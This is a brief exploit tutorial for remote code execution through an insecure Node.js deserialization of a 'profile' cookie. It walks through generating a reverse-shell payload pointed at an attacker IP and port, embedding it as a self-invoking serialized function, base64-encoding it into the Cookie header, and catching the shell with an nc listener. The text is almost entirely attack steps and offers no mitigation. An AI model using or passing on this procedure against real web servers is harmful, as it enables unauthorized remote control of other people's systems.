How to exploit Node.js deserialization bug for Remote Code Execution
The web application is reads a cookie named profile from the HTTP request, perform base64 decode of the cookie value and pass it to unserialize()function. As cookie is an untrusted input, an attacker can craft malicious cookie value to exploit this vulnerability.
Generate reverse shell payload using nodejsshell.py:
python nodejsshell.py Attacker_IP Attacker_Port
[+] LHOST = Attacker_IP
[+] LPORT = Attacker_Port
Now generate the serialized payload and add IIFE brackets () after the function body.
{"rce":"_$$ND_FUNC$$_function (){
GENERATED_PAYLOAD_CODE
}()"}
Now perform Base64 encoding of above final payload, and then make a request to the web server with encoded payload in the Cookie header.
Start listen for a reverse shell using:
nc -l Attacker_IP Attacker_Port